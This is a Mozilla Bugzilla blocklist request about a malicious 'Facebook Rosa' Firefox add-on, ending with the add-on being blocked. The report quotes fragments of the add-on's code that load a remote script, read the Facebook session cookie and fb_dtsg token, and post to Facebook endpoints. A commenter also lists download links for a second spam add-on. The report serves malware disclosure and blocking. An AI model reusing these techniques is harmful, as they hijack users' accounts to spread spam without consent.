Closed
Bug 743484
Opened 12 years ago
Closed 12 years ago
Malicious "Facebook Rosa" add-on
Categories
(Toolkit :: Blocklist Policy Requests, defect)
Toolkit
Blocklist Policy Requests
Tracking
()
RESOLVED
FIXED
People
(Reporter: mhammell, Assigned: jorgev)
Details
Attachments
(1 file)
156.41 KB,
application/octet-stream
|
Details |
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19 Steps to reproduce: Downloaded add-on from http://rosathemenplus.com/plugin.xpi Actual results: Report for http://rosathemenplus.com/plugin.xpi ** Summary ** On install, it will begin programmatically sending spam to your Facebook friends and have you like pages, all without your knowledge or consent. ** Embedded and Remote Files ** lib.js http://temasuperplugin.info?'+Math.random() <http://temasuperplugin.info/?'+Math.random()> icon48.png icon16.png icon128.png manifest.json ** Embedded Metadata ** ** Files Loaded ** ** Remote Javascript Loaded ** ...(a=(b=document).createElement('script')).src='http://temasuperplugin.in <http://temasuperplugin.in/> fo?'+Math... "description": "Verwandeln Sie Ihr Facebook in rosa!", "content_scripts": [ ** Facebook Paths Accessed ** ... F m"}9(3.2.4("o.5/b/a/q.6")!=-1||3.2.4("/b/a/s.6")!=-1){m.3.2=\'7://f.5/t.6?g \'... ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) { "name": "Facebook: Rosa Themen-Plugin", "description": "Verwandeln Sie Ihr Facebook in rosa!", ** Facebook Data Accessed ** var fb_dtsg = Env.fb_dtsg; user_id = readCookie('c_user'); ...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... var fb_dtsg = Env.fb_dtsg; ..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' + '&post_fo... user_id = readCookie('c_user'); ** HTTP Requests ** var c = new XMLHttpRequest(); ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... c['open']('POST', d, true); var c = new XMLHttpRequest(); c['open']('POST', d, true); ** All URLs Loaded or Mentioned ** ...var blog = "http://rosaausgabepro.com/farbe/" + randomFromTo(8601,8800) + ".php"... ...c['open']('GET', 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&... var d = 'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1'; var d = 'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1'; ...document).createElement('script')).src='http://temasuperplugin.info?'+M <http://temasuperplugin.info/?'+M> ath.rando... "update_url": "http://rosaplugin.info/chrome.xml", Expected results: It should not post Facebook messages or like pages without your knowledge or consent.
Assignee | ||
Comment 1•12 years ago
|
||
ID: pink@rosaplugin.info
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Assignee | ||
Comment 2•12 years ago
|
||
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i84
Status: ASSIGNED → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
hi can you ban this spammer addon too http://faceeklenti.com/ http://faceeklenti.com/firefox.php http://faceeklenti.com/eklenti/facebook.xpi you may not access the website by having turkish ip address you can try access to site by http://www.gizlen.net/ a turkish web based proxy
Assignee | ||
Comment 4•12 years ago
|
||
Please read the blocklisting guidelines (https://wiki.mozilla.org/Blocklisting) and file a new blocklist bug if you think it matches our requisites.
Updated•8 years ago
|
Product: addons.mozilla.org → Toolkit
You need to log in
before you can comment on or make changes to this bug.
Description
•